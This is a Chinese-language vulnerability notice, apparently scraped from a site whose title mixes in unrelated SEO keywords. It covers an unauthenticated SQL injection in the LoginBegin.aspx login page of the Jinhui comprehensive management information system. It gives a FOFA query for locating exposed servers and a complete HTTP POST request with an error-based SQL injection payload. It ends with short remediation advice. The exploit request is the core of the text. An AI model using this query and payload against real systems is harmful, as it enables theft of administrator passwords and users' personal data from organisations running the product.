做产品的往这看 国外工业设计网站大全,网站代理备案步骤,wordpress评论上传图片,今天刚刚长沙0x01 产品描述#xff1a; 金慧-综合管理信息系统#xff08;以下简称“金慧综合管理系统”#xff09;是上海金慧软件有限公司基于多年行业系统研发和实施经验#xff0c;为各类企业量身定制的一套综合性管理解决方案。该系统旨在通过信息化手段#xff0c;提升企业的管理…0x01 产品描述 金慧-综合管理信息系统以下简称“金慧综合管理系统”是上海金慧软件有限公司基于多年行业系统研发和实施经验为各类企业量身定制的一套综合性管理解决方案。该系统旨在通过信息化手段提升企业的管理效率优化资源配置实现办公自动化和无纸化办公。系统集成了企业日常办公、项目管理、财务管理、人力资源管理等多个方面的功能通过统一的平台实现数据的共享和流程的协同。该系统以用户需求为导向结合行业最佳实践为企业提供了一套高效、灵活、易用的管理工具。
0x02 漏洞描述 由于金慧-综合管理信息系统 LoginBegin.aspx没有对外部输入的SQL语句进行严格的校验和过滤直接带入数据库执行导致未经身份验证的远程攻击者可以利用 SQL 注入漏洞获取数据库中的信息例如管理员后台密码、站点的用户个人信息。
0x03 搜索语句
Fofabody/Portal/LoginBegin.aspx 0x04 漏洞复现
POST /Portal/LoginBegin.aspx?ReturnUrl%2f HTTP/1.1
Host:your-ip
User-Agent:Mozilla/4.0(compatible; MSIE 6.0;Windows NT 5.1; SV1;QQDownload732;.NET4.0C;.NET4.0E)
Content-Length:363
Content-Type: application/x-www-form-urlencoded
X-Requested-With:XMLHttpRequest
Accept-Encoding: gzip, deflate, br
Connection: keep-aliveTodoValidateLoginName1%27AND5094IN%28SELECT%28CHAR%28114%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28120%29%2BCHAR%28113%29%2B%28SELECT%28CASEWHEN%285094%3D5094%29THENCHAR%2849%29ELSECHAR%2848%29END%29%29%2BCHAR%28113%29%2BCHAR%28107%29%2BCHAR%28118%29%2BCHAR%28120%29%2BCHAR%28113%29%29%29AND%27JKJg%27%3D%27JKJgPasswordCDomainLocalFromUrl
读取编码后的数据 0x05 修复建议
关闭互联网暴露面或接口设置访问权限。
建议对所有输入数据进行严格验证并使用参数化查询。同时应限制数据库用户的权限仅授予执行必要操作所需的最低权限。定期进行安全审计以发现并修复潜在的安全漏洞。
